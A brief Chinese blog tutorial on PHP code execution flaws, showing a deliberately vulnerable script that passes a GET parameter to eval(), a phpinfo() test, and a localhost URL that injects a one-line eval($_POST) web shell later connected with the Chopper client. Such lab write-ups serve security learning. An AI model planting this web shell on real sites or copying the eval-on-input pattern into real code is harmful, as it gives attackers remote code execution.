php代码执行漏洞

php代码执行的两个函数eval(),assert()

<?php
	$i = $_GET['x'];
	eval($i);
?>

 eval()函数将以php类型执行传入的参数x的值

给x传入一个phpinfo();,执行

 

给x传入一个php一句话代码,http://localhost/test/eval/eval.php?x=eval($_POST[a]);

用菜刀连接

连接成功

 

posted @ 2017-12-02 20:42  Sch01aR#  阅读(429)  评论(0编辑  收藏  举报